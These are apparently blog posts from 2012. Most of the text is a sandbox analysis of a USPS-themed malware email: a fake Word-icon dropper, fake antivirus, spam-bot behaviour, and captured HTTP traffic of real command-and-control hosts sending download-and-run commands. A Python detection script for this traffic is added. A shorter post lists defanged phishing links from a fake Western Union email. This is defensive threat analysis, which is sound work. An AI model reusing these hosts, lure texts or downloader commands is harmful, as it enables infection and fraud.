Friday, August 31, 2012

@christoperj:

The most surprising thing to me about Clint Eastwood's speech at the RNC last night wasn't the content and delivery -- but rather that just last February he was being almost universally vilified by Republican pundits about a Super Bowl car commercial which was being wrongly perceived to be an overtly "Democratic" political ad.

If these same pundits can come together to get past the political theatre of distraction and agree that reality is indeed just reality -- why can't we as a society do the same on issues that matter?

Thursday, August 30, 2012

Need to Pay Attention More

Noticed tonight that there are no stop signs on my neighborhood side streets. Wonder if they've been stolen over the years or if they were never there. Either way, I clearly need to pay attention more. . .

No, USPS Did Not Fail to Deliver a Package This Week

Started receiving alerts claiming to be from the USPS concerning a package that could not be delivered.

This is a new take on an old trick, and a 'low-budget' one at that. Whatever the case, this email is also very much malicious. My fully patched Windows 7 sandbox was quickly popped by the bug without any effort. It also did not seem to matter that the user ID had only limited user privileges, and I received no UAC approval window when it was triggered. Very disturbing.

There's no visible text in the email when displayed as HTML. But there is hidden text in the background that is probably intended to make the message appear legitimate to spam filters. The text itself appears to be pulled from 3 novels which have long since found their way into the public domain:

From "Artemus Ward (his travels) among the Mormons, Part 1" by John Camden Hotten (originally published in 1865)
. . .Sometimes they introduce a full brass and string band in Church. Brigham Young says the devil has monopolized the good music long enough, and it is high time the Lord had a portion of it. . .

From "A Fleece of Gold: Five Lessons from the Fable of Jason and Golden Fleece" by Charles Stewart Given (originally published in 1905)
. . .Galen, the famous anatomist, after a prolonged study of the human hand, conceiving it to be the proximate instrument of the soul, was forced to renounce atheism, to acknowledge the existence of a Supreme Being. . .

From "The Entire PG Works by George Meredith, Volume 1 of 10" by George Meredith (originally published in 1851)
. . .Richard mechanically sat down on the crumbling flints to rest, and listened to the panting of the dog. Sprinkled at his feet were emerald lights: hundreds of glow- worms studded the dark dry ground. . .

I wonder how the original email author came upon these three distinctly different novels, as even in an internet-connected world it seems unlikely that they are just the result of a "What novels should I quote to bypass spam filters?" Google search.

That said, the user only sees a low quality jpg image (pulled from http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/HIDVRTXUKI [DOT] jpg) when they open the message claiming that USPS failed to deliver a package. . .
USPS.COM
Unfortunately, we failed to deliver the postal package you have sent on the 27th of august in time, because the recipient's address is erroneous.

Please go to the nearest UPS office and show your shipping label.

If the parcel isn't received within 30 working days our company will have the right claim compensation from you for each day of keeping.
Low quality JPG referring to a phantom parcel

Not sure why I would be taking a USPS/United States Postal Service receipt to a UPS/United Parcel Service office, but whatever.

Clicking on the image sends the user to http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/XREOWCDHOS [DOT] htm, which contains only a very simple piece of JavaScript that commands the browser to download a file named Label_Copy_USPS [DOT] zip. . .
Javascript to download the Label_Copy_USPS file

The zip file itself contains a malicious file named Label_Copy_USPS [DOT] exe, with an embedded icon that makes it look like an MS Word document to the untrained eye.
Not really a word document, no matter what it says
Unique File Details:
Filename -- Label_Copy_USPS [DOT] exe
File size -- 88576 bytes (86.5 KB)
Filetype -- PE32 executable for MS Windows (GUI) Intel 80386 32-bit (Win32 Executable Generic)
MD5 Hash -- 7c35f845a49f95e6797ee89073cf1d89
SHA1 Hash -- 8dc099b23270b70a42dad714a230c4b51eb06175
SHA256 Hash -- 254dd09af71c45cbad147aa523cf7f277340c1e0799fba9b36f20942f295c63d
Online malware scanners identified the file as:
AntiVir -- TR/Crypt.ZPACK.Gen
Avira -- TR/Crypt.ZPACK.Gen
Eset -- Win32/Kryptik.ALDT (Variant)
F-Prot -- W32/Falab.J6.gen!Eldorado
Kaspersky Lab -- Trojan-Downloader.Win32.Kuluoz.ar
McAfee -- Generic BackDoor.adp
Norman -- W32/Obfuscated.D!genr
Sophos -- Mal/EncPk-AGK

The file also appears to have authentic metadata, though it could just as easily be another misdirection.
File Description: Fatal Hums 32
Company: EPoX
File Version: 2.2.0.1112
Date Created: 8/30/2012 6:57 AM
Size: 86.5 KB

Opened the file in the sandbox and confirmed its malicious nature.

It appears to execute, but doesn't display anything but an empty document in notepad named "Label_Copy_USPS". Not sure if that's just for appearance, or if it's exploiting something in notepad on my fully patched sandbox machine.
Just an empty notepad document

The Label_Copy_USPS.exe file with the MSWord icon has also been replaced with an empty text file named Label_Copy_USPS.txt.

After that, nothing else. At least for a few minutes.

Then I get a popup for something called Security Monitor claiming:
Security Monitor: WARNING!

Attention! System detected a potential hazard (TrojanSPM/LX) on your computer
that may infect executable files. Your private information and PC Safety
is at risk.
To get rid of unwanted spyware and keep your computer safe you need to update your computer security software.
Click Yes to download official intrusion detection system (IDS software)
Bogus Security Monitor Warning

Followed by an ominous system tray flag. . .
WARNING!
Application cannot be executed. The file notepad.exe is infected.

Please activate your antivirus software.
Bogus Infected File Flag

And then conveniently a scan from Live Security Platinum (one of the Fake Antivirus variants) which I of course didn't knowingly install. . .
Live Security Platinum (one of the Fake Antivirus variants)

I've seen these before, and it always amuses me how it claims certain applications on the machine are infected (even though they are not actually installed).

But whatever the case, it throws the expected "Your machine is infected with many malicious bugs, It is highly recommended that you remove all the threats from your computer immediately" message.
Bogus Infected Machine Warning

And of course clicking on the button takes the user to an online website asking for a credit card number.

Basically anything that I did on the machine from this point on triggered an alert claiming that whatever application I was trying to open was infected, right after the process was terminated for my 'safety'.

But that's not all that's going on. . .

Behind the scenes, this all starts with an HTTP connection on TCP 84 to a Netherlands IP (93.184.100.116), which pulls down another malicious exe file named 3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exe. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4F30287DE5E832CD19BA0C26553344C35D1833C79DC573864758807A47C3CED5B939DECA6688F364B7F8C HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:53:14 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 49

c=run&u=/get/3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exe

GET //get/3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Host: 93.184.100.116:84
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:53:14 GMT
Content-Type: application/x-msdos-program
Connection: keep-alive
Last-Modified: Thu, 30 Aug 2012 20:30:04 GMT
ETag: "ddc0f1-66a00-4c8818a54eb00"
Accept-Ranges: bytes
Content-Length: 420352

MZ......................@...............................................!..L.!This program cannot be run in DOS mode. [FILE CONTINUES]

And then it pulls yet another malicious file, passF [DOT] dll [DOT] crp. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4F30287DE5E832CD19BA0C26553344C35D1833C79DC573864758807A47C3CED5B939DECA6688F364B7F8C HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:55:18 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 49

c=rdl&u=/get/passF.dll.crp&a=0&k=00005f73&n=passF

GET //get/passF.dll.crp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:55:18 GMT
Content-Type: application/x-msdos-program
Connection: keep-alive
Last-Modified: Fri, 24 Aug 2012 12:47:50 GMT
ETag: "ddc0f8-1a9e00-4c80262356980"
Accept-Ranges: bytes
Content-Length: 1744384

>...p_..w_......._..s_..3_..s_..s_..s_..s_..s_..s_..s_..s_..{^..}@..s...R..L.~Th., p.0gr.2 c.1no..beS-unS6n 7.S .0de]R

W_..s_..+...oO..oO..[FILE CONTINUES]

And because that clearly wasn't enough, it connects to Hong Kong (175.41.28.156) to log itself as 'installed'. . .
GET /api/stats/install/?ts=26070510&affid=41100&ver=3060001&group=liv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent:
Host: 175.41.28.156

HTTP/1.1 200 OK
Server: nginx/1.2.3
Date: Thu, 30 Aug 2012 20:56:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive

Then the bug silently completes a form in Kazakhstan (195.210.47.109) and downloads a spam email template. . .
POST /index.php HTTP/1.1
Host: 195.210.47.109:80:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 746

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"
0549571111555245

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"
13849612

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"
1

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"
137

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"
457

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"
{DAB0CFA5-8A9B-4160-8DA8-8F2A01AC8EF6}

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"
6#2#1#0#7601#0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"
0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"
0

--1BEF0A57BE110FD467A--
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Aug 2012 20:56:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
f4a

HTTP/1.1 200 OK
Date: Thu, 30 Aug 2012 20:56:29 GMT
Server: Apache/2.2.16
Content-Length: 55876
Connection: close
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream

'hr.%+./".,****...)/.'4hr.%.'ywtxp%.'m%.***.'4m%.'h%**/5)+)5)/,5*#)!#/.*,(5)(+5*(*5*-#!#/.*,(5##5.5(!#+.*##5*(#5".5*((!#/.)+(5*(+5*)"5.#!#/.)+"5)+5,#5)/*!#/.-#5*,(5*#)5*)#!#/.,)5..[FILE CONTINUES]

Once that is downloaded, the sandbox becomes a mail zombie and starts blasting the world. . .

Meanwhile. . . the bug is also trying to pull down more badness from Germany (78.159.108.83). . .
GET /ajax/libs/jquery/1.6.4/jquery [DOT] min [DOT] js HTTP/1.1
Accept: */*
Referer: http://chechoutbiz [DOT] com/p/liv/?group=liv&ver=3060001&reject_url=http%3A%2F%2Fchechoutbiz [DOT] com%3A80%2Fp%2Fdecline%2F%3Fgroup%3Dliv%26ver%3D3060001%26nid%3DD0F7718D%26affid%3D41100&nid=D0F7718D&affid=41100

Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Connection: Keep-Alive

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Mon, 02 Apr 2012 18:24:28 GMT
Date: Thu, 30 Aug 2012 18:41:47 GMT
Expires: Fri, 30 Aug 2013 18:41:47 GMT
X-Content-Type-Options: nosniff

Server: sffe
Content-Length: 32103
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 8101

............y..../....MD...j..v.%`C...-..K..aS.....H.Zr......SU(......}...(.j=u.:K.i.l...|....U.?{..M..M...........C.p.-..2.W...i.....U./.+?VIpo...[?.....v.:....O.*[.Q.0...j...?l.(..<[FILE CONTINUES]

And then yet another file from Missouri (209.20.78.241) via TCP84. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37280D51B2FB5E0240E44F8B14D849155C63ADBC2A2CA31 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 209.20.78.241:84

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 30 Aug 2012 21:03:11 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 225

..9.......Q0.r+..W..As..yP........k....mEq.v..j!...fg.@.o?.Y....|.4rh.....5^.....{.j..q.SK.q.....U..........'2.e9..IrKJe.,zSo/..o.a8_.cf.......~(MD.+.P.........f...?......M..^{Q.|.f...@.;.%Y.(.K..8PF..S..\l.%..W..v.&8a.KR....

And then back to Germany (slopokan21 [DOT] ru) to fill out another online form. . .
POST /index [DOT] php HTTP/1.1
Host: slopokan21 [DOT] ru:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 2936

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"
2505323811778201

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"
14097139

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"
0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"
137

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"
457

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"
{DAB0CFA5-8A9B-4160-8DA8-8F2A01AC8EF6}

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"
6#2#1#0#7601#29

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ms"
758019024:121:2000:0:0:0:25:0:0:0:0:0:0:0:0:0:0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="smtx"
CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"
0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"
0

--1BEF0A57BE110FD467A--
HTTP/1.0 303 See Other
Location: http://slopokan21 [DOT] ru:80/index [DOT] php
Content-Length: 0
Connection: close
Date: Thu, 30 Aug 2012 21:00:40 GMT

The connections and downloads continue with zero sign of stopping. And again, all of this is taking place silently behind the scenes without the user ever knowing.
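As an added example (not the blog author's code), here is a small Python rule set run over a constructed, proxy-log-style record of the exchanges above. It flags the traits a defender can key on in this traffic: the impossible "Windows NT 9.0" User-Agent, the empty User-Agent on the install beacon, long hex-token GETs on port 84, the c=run / c=rdl command bodies, PE downloads, and the multipart sid/guid/wv beacon, then checks that every download the command channel ordered was actually fetched. The record layout and rule names are my own assumptions.

```python
import re

# Constructed from the captures on this page (defanged hosts restored to dotted
# form so the rules can match); this is not a real log file.  Each record is one
# request/response pair as a proxy log would summarise it; "form" lists POST fields.
SAMPLE_LOG = [
    {"method": "GET", "host": "93.184.100.116:84",
     "path": "/d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4F30287DE5E832CD19BA0C26553344C35D1833C79DC573864758807A47C3CED5B939DECA6688F364B7F8C",
     "ua": "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
     "resp_ctype": "text/html", "resp_body": "c=run&u=/get/3b0c6a8305cc89cf77f3c9616a569e78.exe"},
    {"method": "GET", "host": "93.184.100.116:84",
     "path": "//get/3b0c6a8305cc89cf77f3c9616a569e78.exe",
     "ua": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0)",
     "resp_ctype": "application/x-msdos-program", "resp_body": "MZ\x90\x00\x03"},
    {"method": "GET", "host": "93.184.100.116:84",
     "path": "/d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4F30287DE5E832CD19BA0C26553344C35D1833C79DC573864758807A47C3CED5B939DECA6688F364B7F8C",
     "ua": "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
     "resp_ctype": "text/html", "resp_body": "c=rdl&u=/get/passF.dll.crp&a=0&k=00005f73&n=passF"},
    {"method": "GET", "host": "93.184.100.116:84", "path": "//get/passF.dll.crp",
     "ua": "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
     "resp_ctype": "application/x-msdos-program", "resp_body": ">\x00\x00\x00p_"},
    {"method": "GET", "host": "175.41.28.156",
     "path": "/api/stats/install/?ts=26070510&affid=41100&ver=3060001&group=liv",
     "ua": "", "resp_ctype": "text/html; charset=utf-8", "resp_body": ""},
    {"method": "POST", "host": "195.210.47.109:80", "path": "/index.php",
     "ua": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)",
     "form": ["sid", "up", "wbfl", "v", "ping", "guid", "wv", "sr", "ar"],
     "resp_ctype": 'multipart/form-data; boundary="1BEF0A57BE110FD467A"', "resp_body": ""},
    # Control record: an ordinary page fetch that should produce no hits.
    {"method": "GET", "host": "www.example.com", "path": "/index.html",
     "ua": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20100101 Firefox/15.0",
     "resp_ctype": "text/html", "resp_body": "<!DOCTYPE html><html>"},
]

# A request path that is nothing but a long hex token, as in the first GET above.
HEX_TOKEN_PATH = re.compile(r"^/[0-9A-Fa-f]{64,}$")
# The downloader's command channel: "c=run" (execute) or "c=rdl" (fetch) plus a "u=" path.
C2_COMMAND = re.compile(r"^c=(run|rdl)&u=/")
# Fields the multipart beacon carried in both POSTs on this page.
BEACON_FIELDS = {"sid", "guid", "wv"}
USUAL_PORTS = {80, 443, 8080}


def port_of(host):
    """Port from a 'host[:port]' string, defaulting to 80."""
    _, _, port = host.partition(":")
    return int(port) if port else 80


def findings(rec):
    """Names of the rules one request/response record trips, in rule order."""
    hits = []
    ua = rec["ua"].strip()
    if not ua:
        hits.append("empty_user_agent")
    elif "Windows NT 9.0" in ua:
        # No Windows release ever identified itself as NT 9.0 (7 is 6.1, 8 is 6.2).
        hits.append("bogus_os_token")
    if port_of(rec["host"]) not in USUAL_PORTS and HEX_TOKEN_PATH.match(rec["path"]):
        hits.append("hex_token_path_on_odd_port")
    if C2_COMMAND.match(rec["resp_body"]):
        hits.append("downloader_command")
    if rec["resp_ctype"].startswith("application/x-msdos-program") or rec["resp_body"].startswith("MZ"):
        hits.append("pe_download")
    if rec["method"] == "POST" and BEACON_FIELDS <= set(rec.get("form", [])):
        hits.append("multipart_beacon")
    return hits


def commanded_downloads(log):
    """(host, path) pairs the command channel told the client to fetch."""
    wanted = []
    for rec in log:
        if C2_COMMAND.match(rec["resp_body"]):
            params = dict(p.split("=", 1) for p in rec["resp_body"].split("&"))
            wanted.append((rec["host"], params["u"]))
    return wanted


def was_fetched(log, host, path):
    """True if a GET to host asked for path (the capture doubles the leading slash)."""
    want = path.lstrip("/")
    return any(r["method"] == "GET" and r["host"] == host and r["path"].lstrip("/") == want
               for r in log)


def triage(log):
    """Flagged records as (host, path, hits), most hits first; clean records are dropped."""
    flagged = [(r["host"], r["path"], findings(r)) for r in log]
    return sorted((f for f in flagged if f[2]), key=lambda f: -len(f[2]))


if __name__ == "__main__":
    for host, path, hits in triage(SAMPLE_LOG):
        print(f"{host} {path[:40]:<40} {', '.join(hits)}")
    for host, path in commanded_downloads(SAMPLE_LOG):
        print(f"commanded: {host}{path} fetched={was_fetched(SAMPLE_LOG, host, path)}")
```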

Good times


Original source email (minus the HTML formatting):
Delivered-To: christoperj
Received: by 10.231.42.212 with SMTP id t20csp39528ibe;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Received: by 10.50.236.39 with SMTP id ur7mr1239726igc.62.1346345530047;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Return-Path:
Received: from mailforward. (mailforward.. [10.10.10.23])
by mx. with ESMTP id i2si3576532icy.69.2012.08.30.09.52.09;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Received-SPF: neutral (: 10.10.10.23 is neither permitted nor denied by best guess record for domain of www@suzan.yourwebhost [DOT] com) client-ip=10.10.10.23;
Authentication-Results: mx.; spf=neutral (: 10.10.10.23 is neither permitted nor denied by best guess record for domain of www@suzan.yourwebhost [DOT] com) smtp.mail=www@suzan.yourwebhost [DOT] com
Received: from mx1. (inbound-us1. [70.87.28.133])
by mailforward. (Postfix) with ESMTP id 72C0E162C3C6
for ; Thu, 30 Aug 2012 16:52:09 +0000 (GMT)
Received: from suzan.yourwebhost [DOT] com (suzan [DOT] yourwebhost [DOT] com [209.239.43.1])
by mx1. (Postfix) with ESMTP id 58343471681
for ; Thu, 30 Aug 2012 16:52:09 +0000 (GMT)
Received: (from www@localhost)
by suzan.yourwebhost [DOT] com (8.14.3/8.12.10) id q7UGq3Uc015428;
Thu, 30 Aug 2012 12:52:03 -0400
Date: Thu, 30 Aug 2012 12:52:03 -0400
Message-Id: <201208301652.q7UGq3Uc015428@suzan.yourwebhost [DOT] com>
To: christoperj
Subject: Delivery refuse ID#36556
From: "USPS Customer Service"
X-Mailer: CF-XPInformer
Reply-To: "USPS Customer Service"
Mime-Version: 1.0
Content-Type:multipart/mixed;boundary="----------1346345523503F9A33361C5"
X-CTCH-Spam: Suspect
X-CTCH-VOD: Unknown
X-CTCH-RefID: str=0001.0A0B0209.503F9A39.0103,ss=2,re=0.000,recu=0.000,reip=0.000,cl=2,cld=1,fgs=0



------------1346345523503F9A33361C5


[LINK TO http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/XREOWCDHOS [DOT] htm USING IMAGE FILE POINTING TO http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/HIDVRTXUKI [DOT] jpg]

There are no ravishingly beautiful women present, and no positively ugly ones. The men are fair to middling. They will never be slain in cold blood for their beauty, nor shut up in jail for their homeliness. There are some good voices in the choir to-day, but the orchestral accompaniment is unusually slight. Sometimes they introduce a full brass and string band in Church. Brigham Young says the devil has monopolized the good music long enough, and it is high time the Lord had a portion of it. Therefore trombones are tooted on Sundays in Utah as well as on other days; and there are some splendid musicians there. The Orchestra in Brigham Young's theatre is quite equal to any in Broadway. There is a youth in Salt Lake City (I forget his name) who plays the cornet like a North American angel. Mr. Stenhouse relieves me of any anxiety I had felt in regard to having my swan-like throat cut by the Danites, but thinks my wholesale denunciation of a people I had never seen was rather hasty.


And the plaudits of men and of angels attend the young man today who has a worthy object in view, who believes in himself, and bends to the oars with might and main. An active hand symbolizes usefulness and thrift. Has it ever occurred to you what a wonderful piece of mechanism is that hand with which Nature has equipped you for seizing the oars of life's activities? Galen, the famous anatomist, after a prolonged study of the human hand, conceiving it to be the proximate instrument of the soul, was forced to renounce atheism, to acknowledge the existence of a Supreme Being. Scientists regard the human hand as being the most remarkable organ, not vital, in the whole animal kingdom. It is conceded to be, also, the most pronounced physical characteristic differentiating man from the lower animals. The chimpanzee and the gorilla, closely allied to the human species in many respects, are noticeably deficient in the use of their modified hands; being able to grasp things only in a cumbersome way.

Tongue out of mouth trotted the little dog after him; crouched panting when he stopped an instant; rose weariedly when he started afresh. Now and then a large white night-moth flitted through the dusk of the forest. On a barren corner of the wooded highland looking inland stood grey topless ruins set in nettles and rank grass-blades. Richard mechanically sat down on the crumbling flints to rest, and listened to the panting of the dog. Sprinkled at his feet were emerald lights: hundreds of glow- worms studded the dark dry ground. He sat and eyed them, thinking not at all. His energies were expended in action. He sat as a part of the ruins, and the moon turned his shadow Westward from the South. Overhead, as she declined, long ripples of silver cloud were imperceptibly stealing toward her. They were the van of a tempest. He did not observe them or the leaves beginning to chatter.




------------1346345523503F9A33361C5--

No, I Do Not Have a Confirmed Money Transfer from Western Union

Received a new version (well, received several times actually) of the old Western Union Money Transfer scam in the last 48 hours.

This latest derivative comes across as an authentic looking email from "2012, Western Union" thanking me (or more specifically, a random name that isn't actually me) for using the Western Union Money Transfer service. The email goes on to say that a credit of several hundred dollars is ready for me to pick up. All I have to do is click on a link for the transaction details.

And as a bonus -- I have also earned Western Union Gold Points for the transaction. I like bonuses. I wonder if I can convert them to airline miles?

Regardless -- like all the versions that came before, this latest incarnation is clearly fake and appears to have been sent with malicious intent.

All of the emails appear to be an attempt to trick the reader into clicking on a variety of non-Western Union links peppered throughout the messages.

None of the links I found in the messages I received were working when I tested.

These links threw an immediate 404 --
http://www [DOT] fantallenatori [DOT] com/pUcAJCR5/index [DOT] html

http://www [DOT] fantallenatori [DOT] com/uAu1GZ1V/index [DOT] html=

http://www [DOT] fantallenatori [DOT] com/6E3eDXLg/index [DOT] html

http://quevenderparaganardinero [DOT] com/ZYbjfFiB/index [DOT] htm

http://quevenderparaganardinero [DOT] com/psdr66QH/index [DOT] html

Weirdly, this single link threw an authentication challenge from www [DOT] pictoo [DOT] de:80 --
http://www [DOT] pictoo [DOT] de/5TpLpTTy/index [DOT] html

These links attempted to redirect to http:// 69.163.40.128 /pxyk80ujzb03h [DOT] php?y=p7tqagmzf8qdjqpi (which also threw a dead 404 error from a nginx v0.7.67 server) --
http://doctorraulseveriche [DOT] com/N9SvVNHj/index [DOT] html

http://inove [DOT] imb [DOT] br/oRVx4RJW/index [DOT] html

http://6-engel [DOT] com/7KwgSTdk/index [DOT] html

http://afistan [DOT] com/TwWrw4T9/index [DOT] html

http://academiaplataforma [DOT] com [DOT] br/EsRMFkkp/index [DOT] html

But during the redirect, it threw a "WAIT PLEASE Loading. . ." message in a format I've seen previously used to send the visitor to a website serving automated exploits back to the visiting user's machine.
WAIT PLEASE Loading. . .

It's possible these 5 specific links might be working at a later time with just a simple DNS update pointing the redirect to another live host.

Good times


Screenshot of an example email:

Yep, this Western Union email is clearly fake

Text of an example email (minus the html formatting):

Delivered-To: christoperj
Received: by 10.231.42.212 with SMTP id t20csp22737ibe;
Thu, 30 Aug 2012 05:54:32 -0700 (PDT)
Received: by 10.42.18.193 with SMTP id y1mr4641886ica.0.1346331271484;
Thu, 30 Aug 2012 05:54:31 -0700 (PDT)
Received-SPF: neutral (: 10.10.10.23 is neither permitted nor denied by domain of commerciale@eurocina.it) client-ip=10.10.10.23;
Received: by 10.64.35.42 with POP3 id e10mf1997265iej.8;
Thu, 30 Aug 2012 05:54:30 -0700 (PDT)
Return-Path:
Delivered-To:
Received: from mx1 ([10.10.10.23])
by mss-us12 (Dovecot) with LMTP id MNheK7NhP1BXIwAAkZ4h7A
for ; Thu, 30 Aug 2012 12:51:09 +0000
Received: from srv534004-1.cloud.colt-engine.it (srv534004-1.cloud.colt-engine.it [81.31.148.114])
by mx1 (Postfix) with ESMTP id 442AB4715AB
for ; Thu, 30 Aug 2012 12:51:09 +0000 (GMT)
Received: from 85-250-70-7.bb.netvision.net.il ([85.250.70.7] helo=eurocina.it)
by srv534004-1.cloud.colt-engine.it with esmtpsa (TLSv1:AES256-SHA:256)
(Exim 4.76)
(envelope-from )
id 1T74CM-0002Od-2o; Thu, 30 Aug 2012 14:50:14 +0200
Message-ID: <337f2ff7.43d9abdf@eurocina.it>
Date: Thu, 30 Aug 2012 14:50:17 +0200
Reply-To: "2012, Western Union"
From: "2012, Western Union"
X-Accept-Language: en-us
MIME-Version: 1.0
To:
Subject: Western Union: Confirmed money transfer
Content-Type: text/html;
charset="us-ascii"
Content-Transfer-Encoding: 7bit

Dear Melanie Gibb,


Thank you for using the Western Union Money Transfer service

Your money transfer has been authorized, and is now available for pick up by the receiver.




Transfers to certain destinations may be subject to further delay or additional restrictions.


TRANSACTION DETAILS:


Your Money Transfer Control Number [MTCN] is: 7741471847


Please use this number for all inquiries.


Date of Order: 08/13/2012
Time of Order: 3:25 p.m. ET
Total Amount: $200.50
Transaction Type: credit
AUTH CODE: 16985615

Selected Additional Service (s):
No Additional Services selected.
